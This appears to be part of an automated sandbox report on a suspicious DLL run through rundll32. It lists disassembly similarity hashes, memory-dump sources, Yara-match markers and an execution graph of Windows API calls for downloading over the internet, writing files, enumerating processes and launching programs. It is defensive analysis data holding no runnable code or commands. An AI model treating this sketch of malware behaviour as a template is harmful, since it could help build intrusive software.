                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                      • Opcode ID: 087e7b3c63a88a435a2e6d937ad598ea21859f3271ec1f8e9716eed55fe6bc31
                                                                                                                                                                                                                                                                      • Instruction ID: dfb6a33e339ab0c6007a7a63b5c9da813757f51a8917a400a443b559987f5a56
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 087e7b3c63a88a435a2e6d937ad598ea21859f3271ec1f8e9716eed55fe6bc31
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43615032508BC886E7A2DF15E4407DAB7A0F7897D8F048216FB9857B95DF78D298CB10
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                      • Opcode ID: 5368d8b1d24fe0368cc4e10c75a835cf7b4598258ec1be9622bc0c1957234e7a
                                                                                                                                                                                                                                                                      • Instruction ID: 8344979c66b9cceb0b7acf630f590e38be3bd2ff735d44e9d3a026d285abadf4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5368d8b1d24fe0368cc4e10c75a835cf7b4598258ec1be9622bc0c1957234e7a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7518A3210468C8AEBA6CF2594447A977A0F358BC4F14C127FB8947BD5CF78D668CB11
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameName::snprintfswprintf
                                                                                                                                                                                                                                                                      • String ID: %lf
                                                                                                                                                                                                                                                                      • API String ID: 3974891382-2891890143
                                                                                                                                                                                                                                                                      • Opcode ID: 7fc1947d49ae169c503500e1267cacb441c981dc534258eb13393c19efbd0a35
                                                                                                                                                                                                                                                                      • Instruction ID: 1d1499fd28cd0defdd0e894b6a29d0ba661b97baa627992bc5e4fd3905ed2300
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fc1947d49ae169c503500e1267cacb441c981dc534258eb13393c19efbd0a35
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C01A221614B9840FB929B25B8013DBA361BF9A7C4F54C322BE5967B65DE2CC2578700
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: NameName::snprintfswprintf
                                                                                                                                                                                                                                                                      • String ID: %lf
                                                                                                                                                                                                                                                                      • API String ID: 3974891382-2891890143
                                                                                                                                                                                                                                                                      • Opcode ID: 43343db7a5785d265fd779c02874dbd2acc63c014a2a9ae2f7173fd214bdd341
                                                                                                                                                                                                                                                                      • Instruction ID: e8046b89d42cedcdfa3f71cef9b3097e4d32cbc59f7538c484cb4a0ec4f8bfae
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43343db7a5785d265fd779c02874dbd2acc63c014a2a9ae2f7173fd214bdd341
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AF08631614BD890FB569B25B8013DBA361BF997C4F54C321BE5957B65CE3CC2578700
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4B0A0000, based on PE: true
• Associated: 00000006.00000002.3332368718.000001FF4B0E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4b0a0000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                      • Opcode ID: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                                                                                                                                                                      • Instruction ID: a25e42b91df9d125d56c0d0429a068c227a1ca83c202503d3eae4a04a1f8034e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50d4aa64397910f34370dcdd3f25db7b3cd1b44d2d627c561aa8e3d7ca6c4d4e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5510A32619B4986DB64CB09E49436AB7A0FB9CB85F140939FB8E877A5DB7CC441CB04
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,000000018001AF96,?,?,000000018001AF96,000000018001AF96,?,000000018001AF96,000000018001AF96,0000000180056604), ref: 0000000180056787
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,000000018001AF96,?,?,000000018001AF96,000000018001AF96,?,000000018001AF96,000000018001AF96,0000000180056604), ref: 0000000180056811
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                                                                                                                      • Opcode ID: b2a80129a009847c2ce996616dbbe413a05851c68b0ba3fa64774bcca3876923
                                                                                                                                                                                                                                                                      • Instruction ID: 1260cb0f68ca8a8ce6bcd19fd34b1b076e826746dc0d6dce6279d08af0310b67
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2a80129a009847c2ce996616dbbe413a05851c68b0ba3fa64774bcca3876923
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E991E472F14A5885FBA2CB6594407ED2BA4F34CBD8F448205FE4A776A5CF36C68AC710
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2943138195-0
                                                                                                                                                                                                                                                                      • Opcode ID: 833d5f12b3745b43fcb298177fc6e3fb40fcfb7b31867bf43b28185f1c8aef01
                                                                                                                                                                                                                                                                      • Instruction ID: be38e034833b563642ed2c4684e659858a25fcc5f3f681f84aaac44cdb52407b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 833d5f12b3745b43fcb298177fc6e3fb40fcfb7b31867bf43b28185f1c8aef01
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D915D77A00B98C9FB938BA4D8403DC37B1B30D789F65C015EE892B695DF798A49C741
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3331451655.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
• Associated: 00000006.00000002.3331409929.0000000273F40000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3331451655.0000000273F85000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Sleep_amsg_exit
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1015461914-0
                                                                                                                                                                                                                                                                      • Opcode ID: 1aa7096d3279892f89bb6938d1e8f798873b932fab0900364294d29769eafb3e
                                                                                                                                                                                                                                                                      • Instruction ID: b36ed253b1f92ff08f278adfa0ead6049e2a2874eebc081211355efa6209b103
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1aa7096d3279892f89bb6938d1e8f798873b932fab0900364294d29769eafb3e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08417C31E0CA4885F765DB1AEC497AA2395B784BE4F744025DE0C87FA1EE28CA40B343
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3863519203-0
                                                                                                                                                                                                                                                                      • Opcode ID: ab40c895ed32f951a42b94f9895b2f8f6206b0eb416bcb5b27eecb077ca5f57b
                                                                                                                                                                                                                                                                      • Instruction ID: 4055e878f64a0d4d9d529e2badb35a1d8728a1b9fc24d6f266f1b5ddb2a3fbf8
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab40c895ed32f951a42b94f9895b2f8f6206b0eb416bcb5b27eecb077ca5f57b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A412576A00B8899EB42CFA4E8403EC37B0F748B98F64C415EE495B79ADF78C649C750
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: __except_validate_context_record
                                                                                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                                                                                      • API String ID: 1467352782-3733052814
                                                                                                                                                                                                                                                                      • Opcode ID: 1f78ce30d5d3abf011c49c12d0b77ceb6a2fa33deb273aa3e414b84e124295c9
                                                                                                                                                                                                                                                                      • Instruction ID: 9c4d39e4c652f3945ef35df7601ed0ac793b78f7d53c8ab04d9db08b0d63a189
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f78ce30d5d3abf011c49c12d0b77ceb6a2fa33deb273aa3e414b84e124295c9
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B27191721046888ADBA2DF25D4507ADBBA0F348BC9F14C126FB8947B89CF38C699C751
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: Unwind__except_validate_context_record
• String ID: csm
• API String ID: 2208346422-1018135373
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: .$_.,
• API String ID: 3215553584-3384562259
Similarity
• API ID: CreateFrameInfo__except_validate_context_record
• String ID: csm
• API String ID: 2558813199-1018135373
Similarity
• API ID: memcpy_s
• String ID: s
• API String ID: 1502251526-453955339
Similarity
• API ID: Name::operator+
• String ID: void$void
• API String ID: 2943138195-3746155364
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                      • Opcode ID: f9df25044fb1202a836735dffd389a5b3e506e3fb2604136da670c11918c1c4a
                                                                                                                                                                                                                                                                      • Instruction ID: 75816c31b48d4b3f6ac9eaf605c0ba6bcc738f1132b3e0c24f52f264a28ed543
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9df25044fb1202a836735dffd389a5b3e506e3fb2604136da670c11918c1c4a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B811FB32214B4482EBA28B15E44039A77E5F78CBD8F688225EADD07759DF7DC655CB00
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLastLibraryLoad
                                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3568775529-2084034818
                                                                                                                                                                                                                                                                      • Opcode ID: 3ce1118a3d68641cf7bcb52c8cfbeb9de588c640064439e36528d49136769137
                                                                                                                                                                                                                                                                      • Instruction ID: d49a7e86271a456fbcda335a6394c0a77c9d8b30d4fb553590f1245fc1ea6585
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ce1118a3d68641cf7bcb52c8cfbeb9de588c640064439e36528d49136769137
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0653171150C82FBF69B6658457F622929B4DBD0F58D830FE0546791EE2D878E8700
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4B0A0000, based on PE: true
• Associated: 00000006.00000002.3332368718.000001FF4B0E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4b0a0000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLastRead
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4100373531-0
                                                                                                                                                                                                                                                                      • Opcode ID: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                                                                                                                                                                      • Instruction ID: 6335f2db976b91a2273927bd39dbc1689edf003861b3a897d5821b2fb13e55c5
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e3dd03f4e36ac629c9e35720315601d05ef0c3755c38ff15dc0a5ec62299b24
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4191CA36219B8886DB60CB0AE49036AB7A0F7CDB95F544525EB8E83769DF7CC455CB00

                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                      Execution Coverage:11.5%
                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                      Signature Coverage:1.3%
                                                                                                                                                                                                                                                                      Total number of Nodes:871
                                                                                                                                                                                                                                                                      Total number of Limit Nodes:11
4015 305800e 4014->4015 4164 305c7dc 4015->4164 4018 305b388 NtAllocateVirtualMemory 4019 305803d CreateThread 4018->4019 4020 30582b4 NtFreeVirtualMemory 4019->4020 4020->4012 4026 3054a2c 4021->4026 4022 3054acc 4022->3884 4023 3054aec MultiByteToWideChar 4024 305830c 4 API calls 4023->4024 4024->4026 4025 3054b7d MultiByteToWideChar 4025->4026 4026->4022 4026->4023 4026->4025 4027 3054bd6 wsprintfW 4026->4027 4028 3057a84 21 API calls 4027->4028 4028->4026 4031 3057ac4 4029->4031 4036 3057b28 4031->4036 4037 305c00c NtAllocateVirtualMemory 4031->4037 4040 305900c 4031->4040 4060 30576d8 4031->4060 4072 3058240 4031->4072 4032 3057c5d 4034 3057c68 4032->4034 4035 30582b4 NtFreeVirtualMemory 4032->4035 4033 30582b4 NtFreeVirtualMemory 4033->4032 4034->3903 4034->3906 4035->4034 4036->4032 4036->4033 4037->4031 4041 305904b InternetOpenW 4040->4041 4042 3059086 4041->4042 4043 305908b 4041->4043 4045 305923d InternetCloseHandle 4042->4045 4046 3059248 4042->4046 4078 30555dc 4043->4078 4045->4046 4048 3059250 InternetCloseHandle 4046->4048 4049 305925b 4046->4049 4048->4049 4049->4031 4050 30590f4 4052 3059106 4050->4052 4053 30582b4 NtFreeVirtualMemory 4050->4053 4054 3059118 InternetOpenUrlW 4052->4054 4055 30582b4 NtFreeVirtualMemory 4052->4055 4053->4052 4054->4042 4057 3059154 4054->4057 4055->4054 4056 305915f InternetReadFile 4056->4057 4057->4042 4057->4056 4058 305b388 NtAllocateVirtualMemory 4057->4058 4059 305b648 3 API calls 4057->4059 4058->4057 4059->4057 4100 30592f8 4060->4100 4065 305774e 4068 30582b4 NtFreeVirtualMemory 4065->4068 4071 30576fb 4065->4071 4066 305bf78 3 API calls 4067 3057729 4066->4067 4067->4065 4069 305772d 4067->4069 4068->4071 4070 30582b4 NtFreeVirtualMemory 4069->4070 4070->4071 4071->4031 4112 30580b8 4072->4112 4075 305827f 4075->4031 4079 3055614 4078->4079 4080 305b388 NtAllocateVirtualMemory 4079->4080 4081 305563a 4080->4081 4082 305b388 NtAllocateVirtualMemory 4081->4082 4083 3055650 InternetCrackUrlW 4082->4083 4084 
30556ac 4083->4084 4085 30556c6 4083->4085 4086 30582b4 NtFreeVirtualMemory 4084->4086 4085->4042 4085->4050 4089 305c860 4085->4089 4087 30556b9 4086->4087 4088 30582b4 NtFreeVirtualMemory 4087->4088 4088->4085 4090 305c894 InternetConnectW 4089->4090 4091 305c8df 4089->4091 4090->4091 4094 305c8e4 HttpOpenRequestW 4090->4094 4092 305c9d5 InternetCloseHandle 4091->4092 4093 305c9e0 4091->4093 4092->4093 4095 305c9f3 4093->4095 4096 305c9e8 InternetCloseHandle 4093->4096 4094->4091 4097 305c936 HttpSendRequestW 4094->4097 4095->4050 4096->4095 4098 305c955 InternetQueryOptionW InternetSetOptionW 4097->4098 4099 305c9a7 HttpSendRequestW 4097->4099 4098->4099 4099->4091 4101 305c00c NtAllocateVirtualMemory 4100->4101 4103 3059318 4101->4103 4102 30576f7 4102->4071 4105 305bf78 4102->4105 4103->4102 4104 30582b4 NtFreeVirtualMemory 4103->4104 4104->4102 4106 305bf90 4105->4106 4109 305bf0c 4106->4109 4108 3057713 4108->4065 4108->4066 4110 305b704 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4109->4110 4111 305bf40 4110->4111 4111->4108 4113 30580f9 4112->4113 4114 305810b RtlInitUnicodeString NtCreateFile 4113->4114 4115 30581b1 4114->4115 4115->4075 4116 30581c8 NtWriteFile 4115->4116 4117 3058230 NtClose 4116->4117 4117->4075 4119 305b470 4118->4119 4120 3058326 SHGetFolderPathW 4119->4120 4121 305834f 4120->4121 4122 305c00c NtAllocateVirtualMemory 4121->4122 4124 305835b 4122->4124 4123 3058368 4123->3913 4124->4123 4125 305bf78 3 API calls 4124->4125 4125->4123 4127 305b8ee 4126->4127 4128 305b926 CreateProcessW 4127->4128 4129 305b976 4128->4129 4130 305b97a CloseHandle CloseHandle 4128->4130 4129->3921 4130->4129 4132 305b9c0 4131->4132 4133 305ba1e 4132->4133 4134 305ba78 4132->4134 4135 305ba53 wsprintfW 4133->4135 4136 305baad wsprintfW 4134->4136 4137 305bac8 CreateProcessW 4135->4137 4136->4137 4138 305bb1f CloseHandle CloseHandle 4137->4138 4139 305bb1b 4137->4139 4138->4139 4139->3941 4141 305297e 4140->4141 4142 3052659 Process32First 
4140->4142 4141->3974 4142->4141 4145 305267f 4142->4145 4143 3052963 Process32Next 4143->4141 4143->4145 4144 305be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4144->4145 4145->4143 4145->4144 4146 305279f wsprintfA 4145->4146 4147 305be64 3 API calls 4146->4147 4149 30527cf 4147->4149 4148 305be64 3 API calls 4148->4149 4149->4148 4150 3052839 wsprintfA 4149->4150 4151 305be64 3 API calls 4150->4151 4154 3052869 4151->4154 4152 305260c 3 API calls 4152->4154 4153 305be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4153->4154 4154->4152 4154->4153 4155 305be64 3 API calls 4154->4155 4155->4143 4157 305b470 4156->4157 4158 30583b2 SHGetFolderPathA 4157->4158 4159 30583db 4158->4159 4160 305bfc0 NtAllocateVirtualMemory 4159->4160 4162 30583e7 4160->4162 4161 30583f4 4161->3985 4162->4161 4163 305be64 3 API calls 4162->4163 4163->4161 4165 305c7ef 4164->4165 4167 3058033 4164->4167 4166 305b388 NtAllocateVirtualMemory 4165->4166 4166->4167 4167->4018 4169 3054411 4168->4169 4170 305bfc0 NtAllocateVirtualMemory 4169->4170 4171 3054444 4170->4171 4172 30544a4 4171->4172 4174 3054451 4171->4174 4175 305448f MessageBoxA 4171->4175 4173 30582b4 NtFreeVirtualMemory 4172->4173 4173->4174 4175->4172 4200 3053304 4201 3053349 4200->4201 4259 3053322 4200->4259 4202 305b388 NtAllocateVirtualMemory 4201->4202 4203 3053353 4202->4203 4203->4259 4318 3052164 4203->4318 4205 3053406 4206 3052164 21 API calls 4205->4206 4207 305349e 4206->4207 4208 3052164 21 API calls 4207->4208 4209 3053537 4208->4209 4210 3052164 21 API calls 4209->4210 4211 30535d0 4210->4211 4212 3052164 21 API calls 4211->4212 4213 3053669 4212->4213 4214 3052164 21 API calls 4213->4214 4215 3053702 4214->4215 4216 3052164 21 API calls 4215->4216 4217 305379b 4216->4217 4218 3052164 21 API calls 4217->4218 4219 3053834 4218->4219 4220 3052164 21 API calls 4219->4220 4221 30538cd 4220->4221 4222 3052164 21 API calls 4221->4222 4223 3053966 4222->4223 4224 3052164 21 API calls 
